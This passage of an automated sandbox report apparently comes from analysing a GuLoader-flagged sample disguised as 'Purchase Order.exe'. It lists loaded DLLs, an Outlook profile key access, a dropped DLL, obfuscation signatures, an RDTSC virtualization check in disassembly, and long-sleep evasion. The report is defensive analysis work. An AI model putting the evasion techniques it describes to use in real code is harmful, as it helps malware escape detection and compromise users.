Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File written: C:\ProgramData\ankomstperrons.ini Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Purchase Order.exe Static file information: File size 1055136 > 1048576
Source: Purchase Order.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.2755799259.0000000005F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_10002D20 push eax; ret 0_2_10002D4E
Drops PE files
Source: C:\Users\user\Desktop\Purchase Order.exe File created: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\Purchase Order.exe API/Special instruction interceptor: Address: 659F591
Source: C:\Users\user\Desktop\Purchase Order.exe API/Special instruction interceptor: Address: 27EF591
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Purchase Order.exe RDTSC instruction interceptor: First address: 653E3D2 second address: 653E3D2 instructions: 0x00000000 rdtsc 0x00000002 test ah, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FA27052805Fh 0x00000008 cmp cx, 58E6h 0x0000000d inc ebp 0x0000000e test bh, ah 0x00000010 inc ebx 0x00000011 test bl, bl 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Purchase Order.exe RDTSC instruction interceptor: First address: 278E3D2 second address: 278E3D2 instructions: 0x00000000 rdtsc 0x00000002 test ah, ch 0x00000004 cmp ebx, ecx 0x00000006 jc 00007FA270755D7Fh 0x00000008 cmp cx, 58E6h 0x0000000d inc ebp 0x0000000e test bh, ah 0x00000010 inc ebx 0x00000011 test bl, bl 0x00000013 rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Purchase Order.exe Memory allocated: 110000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Memory allocated: 36830000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Memory allocated: 38830000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599657 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599532 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599421 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598938 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598813 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598703 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598594 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598469 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598235 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598016 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597891 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597766 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597657 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597532 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597407 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597297 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597063 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596938 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596813 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596688 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596344 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595985 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595860 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595735 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595610 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595485 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595365 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594985 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594860 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594735 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594610 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594485 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594360 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594235 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594110 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Purchase Order.exe Window / User API: threadDelayed 2128 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Window / User API: threadDelayed 7691 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Purchase Order.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj39BE.tmp\System.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Purchase Order.exe API coverage: 1.5 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep count: 41 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -37815825351104557s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 4592 Thread sleep count: 2128 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -599875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 4592 Thread sleep count: 7691 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -599766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -599657s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -599532s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -599421s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -599313s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -599188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -599063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -598938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -598813s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -598703s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -598594s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -598469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -598344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -598235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -598125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -598016s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -597891s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -597766s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -597657s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -597532s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -597407s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -597297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -597188s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -597063s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -596938s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -596813s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -596688s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -596578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -596469s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -596344s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -596235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -596110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -595985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -595860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -595735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -595610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -595485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -595365s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -595235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -595110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -594985s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -594860s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -594735s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -594610s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -594485s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -594360s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -594235s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe TID: 1076 Thread sleep time: -594110s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_0040270B FindFirstFileA, 0_2_0040270B
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_004061FB FindFirstFileA,FindClose, 0_2_004061FB
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405799
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0040270B FindFirstFileA, 4_2_0040270B
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_004061FB FindFirstFileA,FindClose, 4_2_004061FB
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_00405799
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599657 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599532 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599421 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599313 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 599063 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598938 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598813 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598703 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598594 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598469 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598344 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598235 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598125 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 598016 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597891 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597766 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597657 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597532 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597407 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597297 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597188 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 597063 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596938 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596813 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596688 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596578 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596344 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595985 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595860 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595735 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595610 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595485 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595365 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594985 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594860 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594735 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594610 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594485 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594360 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594235 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Thread delayed: delay time: 594110 Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache Jump to behavior
